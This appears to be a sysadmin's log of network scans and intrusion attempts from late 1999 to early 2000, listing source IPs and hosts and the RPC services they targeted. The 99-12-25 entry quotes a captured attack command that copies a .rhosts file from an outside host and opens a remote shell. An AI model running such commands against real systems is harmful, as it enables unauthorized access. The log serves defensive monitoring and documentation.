Here are some of the attacks I have seen on our network. Date/time from (id:port) attack/scan 99-10-23 15:07:22 12.31.99.208 scan snmp ports 99-10-23 21:54:07 198.138.182.2:2666 scan net for port 111 - portmapper port 99-10-23 23:24 38.27.152.11 port scan on DNS server. 99-10-24 05:57 208.23.84.81 scan net for port 111 06:20:22 login1.sol.no telnet to port 23 99-10-24 06:39 160.85.128.2:(twins.zhwin.ch) attack statmon2 port, 99-10-24 06:50 160.85.128.2:(twins.zhwin.ch) attack CMSD port 99-10-24 06:57 208.23.84.81 scan net for port 111 - portmapper port 99-10-25 08:46 194.202.96.10 scan net for snmp ports. 99-10-25 23:53 194.90.176.98 (dune.ramat-negev.org.il) ttdbserverd attack 99-10-26 04:01 195.7.48.28 (crmonitor.emcweb.ie) SNMP network scan 99-10-26 09:43:22 194.202.96.10 scan net for snmp ports. 99-10-26 11:50:09 197.7.48.28 (crmonitor.emcweb.ie) scan net for snmp ports 99-10-26 12:56:57 197.7.48.28 (crmonitor.emcweb.ie) scan net for snmp ports 99-10-26 13:23:24 197.7.48.28 (crmonitor.emcweb.ie) scan net for snmp ports 99-10-26 18:25:27 200.38.228.2:2666 1 syn packet to port 111 on local machine. machine had been off for 1 wk prior to 99-10-26. No other packets to/from local mach. Other specific machines on campus also scanned, but not the local net. 99-10-26 20:40 216.165.154.100:887 probe of port 111 on server ace 99-10-26 21:39:35 192.217.153.6 probe of port 111 on server ace 99-10-27 07:11:28 197.7.48.28:1029 (crmonitor.emcweb.ie) scan net for snmp ports 99-10-27 11:10:32 194.198.131.100:1586 (ws100.dafix.se) scan net for snmp ports 99-10-27 17:34:05 203.35.9.8:2666 (presto.pis.com.au) scan net for port 111 - portmapper port 99-10-27 19:52:40 200.244.19.2 scan net for port 111 - portmapper port 99-10-28 08:56:38 140.203.16.53:0 (it.nuigalway.ie) scan ace for port 111 (syn only) 99-10-28 09:43:51 209.125.157.110 (mastermag.magnitudenetwork.net) major port scan on prime 99-10-28 16:33:23 166.104.13.118:688(ccfl.hanyang.ac.kr) scan net for port 111 - portmapper port 99-10-28 16:35:15 207.155.178.36(ts016d24.sto-ca.concentric.net) attack via statmon ports to boss. 99-10-31 20:44:22 210.154.23.210 (redmoon.minato.co.jp) scan ace for port 111 99-11-02 00:44:33 209.83.173.199 (pit07.mentora.com) query port 111 on ace. telnet probes to ace. 99-11-02 01:11:55 207.106.6.12 (scott.ndepot.com) query port 111 on ace. 99-11-02 10:54:06 24.93.117.179 (dhcp93117179.columbus.rr.com) scan net for multiple ports 99-11-03 00:21:47 24.10.120.91 (cc36308-b.ewndsr1.nj.home.com) scan net for port 111 99-11-03 00:43:17 208.152.103.92 (pm3-26.ppp92.webzone.net) probe mountd, port 32785 on boss 99-11-03 07:07:34 148.134.30.1 (corp.dukepower.com) probe snmp ports on net 99-11-04 12:11:33 194.198.131.100:1084 (ws100.dafix.se) scan net for snmp ports 99-11-04 23:32:33 194.198.131.100:1084 (ws100.dafix.se) scan net for snmp ports 99-11-05 01:00:01 205.216.98.2 (not.friend.ly.net) scan ace portmapper port 99-11-05 03:04:42 194.198.131.100:1084 (ws100.dafix.se) scan net for snmp ports 99-11-05 07:12:01 204.143.4.2 (ip.2.highspeed.net) scan ace for multiptl ports. 99-11-05 09:07:52 208.20.79.119 () scan net for port 111 99-11-05 19:18:29 204.29.160.17 (courses.ju.edu) scan port 111 on ace 99-11-05 20:29:50 204.143.164.5 (linux.bboard.com) scan port 111 on ace 99-11-06 17:11:23 205.216.98.240 (not.friend.ly.net) scan ace for port 111 99-11-06 22:11:35 163.152.145.248:0 (mli.korea.ac.kr) scan ace for port 111 99-11-06 22:21:58 205.198.37.140 (someone.corpcomm.net) scan net for port 111 99-11-06 22:41:45 195.185.17.36:0 () scan net for port 111 99-11-07 01:23:45 202.238.79.97 (www.sonylife.co.jp) ttdbdserver attack on boss 99-11-07 01:55:25 200.238.252.127 () connection in INGRIS lock port on ace(?) 99-11-07 01:55:37 131.230.73.140 (aviator.cwis.siu.edu) probe net for port 111 99-11-07 04:09:57 138.253.48.245 () probe net for port 111 99-11-07 16:49:54 164.125.144.50 (vortex.phys.pusan.ac.kr) probe net for port 111 99-11-07 20:05:05 210.230.185.130 (dns1.riecco.co.jp) scan net for port 111 99-11-07 22:12:31 164.125.144.50 (vortex.phys.pusan.ac.kr) scan net for port 111 99-11-07 17:48:15 205.216.98.240 (not.friend.ly.net) scan ace for port 111 99-11-08 17:00:35 205.216.98.240 (not.friend.ly.net) scan boss for port 111 99-11-09 23:41:30 130.39.27.5 (home.eng.lsu.edu) portmap scan on ace 99-11-09 05:42:31 168.57.107.121 (79059890.rsh.mhmr.state.tx.us) snmp probe 99-11-09 18:30.00 212.116.0.0 net (...gb) dns attack on ace 99-11-10 02:09:58 168.57.107.121 (79059890.rsh.mhmr.state.tx.us) snmp probe 99-11-10 04:05:49 141.223.41.2 (anyon.postech.ac.kr) CMSD buff. ovflow attack 99-11-12 10:53:38 208.176.152.70 (w070.z208176152.sjc-ca.dsl.cnc.net) scan net for port 1111 99-11-13 22:57:52 208.19.238.100 (pn-dialkn1-36.primary.net) port scan of freent 99-11-14 04:03:53 24.200.169.69 (modemcable069.169-200-24.mtl.mc.videotron.net) scan port 111 99-11-14 15:39:08 195.121.193.156 (nm0412-1.dial.wxs.nl) scan port 111 on ace 99-11-16 17:36:28 192.114.163.214 (from net.il.) ports probe of net 99-11-17 13:58:10 192.114.163.214 (from net.il.) scan net for various ports 99-11-17 23:32:15 139.78.94.217 (swan.ceatlabs.okstate.edu) scan net ports 111 and 2222 99-11-18 11:22 thru 99-11-19 02:19 192.114.163.214 (from net.il.) scan ports 161,21 99-11-19 05:53:53 128.134.189.253 (sng.co.kr) scan net for port 111 99-11-19 08:38 192.114.163.214 (from net.il.) scan ports 161 99-11-19 15:51:43 209.108.127.41 (?.netcom.net) scan BRANDX for port, ftpd. tried to create dir CCScanner943044918 99-11-20 05:19:36 212.57.148.36 (wizard.enter.com.ru) use anon ftp to ace to get password file. 99-11-20 07:18:57 200.210.225.14 (Intranet.hack.com.br) portmap probe of net 99-11-20 14:32:20 192.114.163.214 (from net.il.) scan ports 161 99-11-21 06:28:35 206.62.104.55 (55-pool1.ras10.calan.agisdial.net) probe ace for ports. Stupid probe of ftpd holes. 99-11-25 23:57 203.230.144.127 () probe of port 111 on ace 99-11-26 01:11:04 209.181.78.41 (www2.bihnsystems.com) port 111 net probe. 99-11-26 04:31:09 192.215.107.134 (w3.design4.cerf.net) port 111 net probe. 99-11-26 04:31:09 192.215.107.134 (w3.design4.cerf.net) sadmind buffer overflow attack against prime. 99-11-27 01:12:34 24.112.49.46 (cr925828-a.lndn1.on.wave.home.com) probe port 111 on net 99-11-27 10:18:48 208.2.77.217 () port scan of ace 99-11-27 13:06:25 200.223.112.241 (dl2-241.ssa.zaz.com.br) port scan 111 of ace 99-11-27 18:34:28 195.83.64.108 (athena.ceat.univ-poitiers.fr) net scan ports 98 99-11-28 19:37:45 168.188.58.84 () scan port 111 on ace 99-12-2 16:13:24 168.159.146.190 () port scan 161 on net. 99-12-05 01:40:50 209.98.163.187 () port scan of port 111 on net 99-12-05 02:22:00 147.46.42.90 (hyper.snu.ac.kr) scan ports on DNS servers 99-12-05 15:52:49 38.27.213.127 (ip127.houston13.tx.pub-ip.psi.net) port 111 scan on ace 99-12-06 00:04:07 200.230.111.102 () NETBUS and BACKORIFICE port scan of net. 99-12-09 15:24:24 216.35.132.6:2666 (lizzy.cyberhost.com.au) scan ace for ingris lock port. 99-12-09 23:21:56 208.24.200.198:2792 (cm20824200198.laketravis.ispchannel.com) scan ace for port 111 99-12-10 02:43:58 208.24.200.198:2792 (cm20824200198.laketravis.ispchannel.com) scan ace for port 111 99-12-11 22:15:17 200.203.198.200 (pointer gzp.sysnet.com.br) scan ace for port 111 99-12-11 22:17:03 216.102.107.60 (adsl-216-102-107-60.dsl.scrm01.pacbell.net) scan net for port 98 99-12-11 23:52:49 24.26.85.46 (242685hfc46.tampabay.rr.com) scan net for port 111 99-12-12 01:48:29 38.150.78.2 (emcon4.emconfm.com) scan net for port 98 99-12-12 12:16:21 128.59.19.197(pennstation.cs.columbia.edu) scan net for port 111 99-12-12 18:35:46 212.106.211.178 () probes on ace, boss various ports 99-12-12 19:35:14 200.203.198.200 (gzp.sysnet.com.br) scan ace for port 111 99-12-12 22:58:18 147.83.4.160 (mat014.eupvg.upc.es) scan net for port 111 99-12-13 17:38:28 203.251.180.252 (bbs.tntnet.co.kr) scan ports on ace 99-12-14 01:35:06 24.5.186.138 (cx363361-a.elcjn1.sdca.home.com) scan net for port 111 99-12-15 17:55:49 210.116.148.6 (open.co.kr) scan boss for port 111 99-12-16 16:20:42 210.116.149.6 (open.co.kr) scan ace for port 111 99-12-17 01:41:35 144.167.69.133 (dhcp133.cs.ualr.edu) scan ace for port 111 99-12-17 02:47:44 200.210.184.229 (dlp-0483.sts.uol.coastalway.com.br) scan ace for port 111 99-12-17 16:44:04 212.106.211.245 () port scan of ace. 99-12-17 21:47:46 200.210.146.46 (dlp-0554.sts.uol.coastalway.com.br) scan port 111 on ace 99-12-20 09:19:14 210.222.148.193 () scan port 111 on ace. 99-12-20 18:24:10 211.38.9.253:53 () scan port 111 on ace (FROM PORT 53) 99-12-20 19:40:17 203.231.182.65:53 () scan port 111 on ace (FROM PORT 53) 99-12-21 05:20:54 63.11.25.249 (1Cust249.tnt1.yakima.wa.da.uu.net) scan ports on ace. 99-12-21 07:28:19 132.166.222.62 (applepie.saclay.cea.fr) scan port 139 on net 99-12-22 23:08:19 210.102.130.154:53 (stone.chch-c.ac.kr) scan port 111 on net 99-12-23 19:08:30 155.230.156.225 (rigel.kyungpook.ac.kr) scan net for ports 1, 530,111 99-12-24 11:19:57 210.183.196.234 () scan port 111 on ace 99-12-24 20:13:10 203.232.229.166:53 () scan port 111 on ace 99-12-25 01:06:01 203.231.182.65 () scan port 111 on ace 99-12-25 08:04:00 210.225.33.66 ( nickname for 66.64.33.225.210.in-addr.arpa which is ns.artteknika.com) scan net for port 111 99-12-25 13:01:20 210.225.33.66 ( nickname for 66.64.33.225.210.in-addr.arpa which is ns.artteknika.com) attack several machines with lockd overflow attack (/tmp/bob....) 99-12-25 13:12:24 62.252.132.115 (m115-mp1-cvx1a.ren.ntl.com) access to INGRESLOCK port on several machins, followed by scans of ports 111 and high numbered ports such as 32814 and 33280 99-12-25 14:45:59 210.225.33.66 ( nickname for 66.64.33.225.210.in-addr.arpa which is ns.artteknika.com) scan machines for port 530 99-12-25 15:46:46 206.141.240.187 (dyn1-tnt1-187.indianapolis.in.ameritech.net) scan net 132.234.4.x, followd by attack to pcnfsd port on topdog with cmd ......configuration.......blah....USERNAME.....cd ...cd ...cd .. .cd ...cd bin.PATH=.:$PATH.export PATH.csh -c "cd ...cd ...cd .. .cd usr.cd ucb.rcp bob@shell.foobar.com:.rhosts ~USERNAME." followed by packet to rshell port of USERNAME /bin/sh -i 99-12-26 05:19:42 192.146.226.11:53 () scan port 111 on ace 99-12-26 06:52:27 204.178.16.36 (ches-netmapper.research.bell-labs.com) scan port 37502 on ace UDP with email addr in packet of ches@bell-labs.com 99-12-26 07:17:23 62.104.184.131 () scan port 722, 10752, 111, 179 on ace mountd attack, strings contain "Privet ADMcrew" in packet. 99-12-13 09:13:50 212.27.52.136 (lyon1-52-136.dial.proxad.net) scan port 137 on ace. 99-12-26 09:32:27 206.161.225.2 (columbia.digiweb.com) scan port 111, 1524,1067 on ace - CMSD attack. - packets have strings "root.IIE@foobar", "root.FJC@foober", etc. in them. 99-12-26 16:41:27 209.247.64.7 () scan net for port 37875 99-12-27 07:23:47 204.210.9.61 (dt020n3d.san.rr.com) scan port 111 on ace. 99-12-27 11:51:32 209.207.141.157:2666 () scan net for port 111. 99-12-27 17:49;44 24.237.23.239:777 (cable-239-23-237-24.juneau.ak.net) probe port 111 on ace 99-12-27 20:56:16 209.207.141.157:0 () scan net for port 109. 99-12-28 05:22:19 216.132.56.203(ip203.trusolutions.com) scan 132.235.17.106 for port 111 99-12-28 06:15:11 202.8.228.193 () scan ace, then net for SNMP ports. + others 99-12-28 12:54:18 12.32.192.68 () scan net for SNMP ports. 99-12-28 16:31:27 207.33.151.244() scan net for port 111 99-12-28 15:31:16 140.254.61.124 (gsu.med.ohio-state.edu) scan on net for port 111? Seems weird. 99-12-28 20:23:59 63.22.60.155 (2Cust27.tnt10.atl2.da.uu.net) probe boss 99-12-29 08:29:09 194.183.200.103 (nickname for 103.0.200.183.194.in-addr.arpa kip03.mcom.fr) probe ports 139 and 137 on ace. 99-12-29 12:47:53 210.226.176.178 () portmapper probe on ace. 99-12-29 15:55:xx 204.178.107.81 (meibak.medianext.com) buffer overflow attack against ace. 99-12-29 16:18:29 210.226.176.178 () portmapper probe on ace, followed by attmpted connection to port 1524 99-12-29 21:28:01 146.164.112.10 () scan net for port 1, 111 99-12-30 16:40:05 206.146.144.1 (riptide.WaveTech.net) probe ports 23 and 111 on prime. 99-12-30 16:40:36 204.193.147.58 () bang on port 15 on prime with no success, then hit ports 111 followed by 32782 repeatedly (try for buffer overflow) 99-12-30 16:41:57 208.16.68.100 (famvid.com) probe ports on boss,use admind overflow bug to break in, run inetd with trojan on port 15. 99-12-31 04:38:17 202.101.107.246 (qzbar53.qz.fj.cn) probe ace and boss for various ports 99-12-31 09:15;26 206.161.225.2 (columbia.digiweb.com) hit ports 1524 on ace, floowed by lop of ports 111 then 1089... (calender manager attack with signiture of root.TFA@foobar in packet) 00-01-02 01:00:58 195.191.160.66 (dns1.teleposta.it) portmapper scan against ace 00-01-02 01:17:22 200.188.12.251 (bh-tnt-01-251.horizontes.com.br( attack ace - scan port 111, scan pcnfsd, try rhosts cmd against user., try putting line into .rhosts of lmachado@planetarium.com.br. 99-01-01 05:08:12 168.187.217.98 () probe portmap on ace. 00-01-02 01:28:52 24.239.21.177 (n06h1177.ex-pressnet.com) scan port 137 on ace 00-01-02 01:51:20 209.239.131.101 (port-03-31.athens.eurekanet.com) scan port 137 on ace 00-01-02 08:46:35 210.206.73.41 () scan portmapper on ace 00-01-02 13:01:22 203.232.129.19 () scan portmapper on ace and prime 99-01-02 13:32:41 38.38.3.73(ip73.raleigh13.nc.pub-ip.psi.net) probe ports 1083,1090 on homeip 00-01-02 13:51:51 62.108.16.131 (node1083.a2000.nl) scan net for port 111, buffer overflow against rpc program 100232 (sadmind) on boss. 00-01-03 03:26:01 203.231.182.65:53 () probe portmapper port on ace 00-01-03 11;24:03 210.206.73.41:824 () get portmap from ace 00-01-03 11:42:51 210.226.176.178:2666 () scan for port 111 on ace 00-01-03 12:36:31 193.94.205.210 (smile.kotisivupalvelu.fi) scan port 111 on net 00-01-03 21:23:11 203.231.182.65:53 () probe portmaper port on boss 00-01-03 16:32:16 193.207.118.21 () probe export maps on boss - packets contains js0.marano.nettuno.it 00-01-04 08:56:23 199.217.207.66 (ftp.peabodygroup.com) probe statmon port on ace.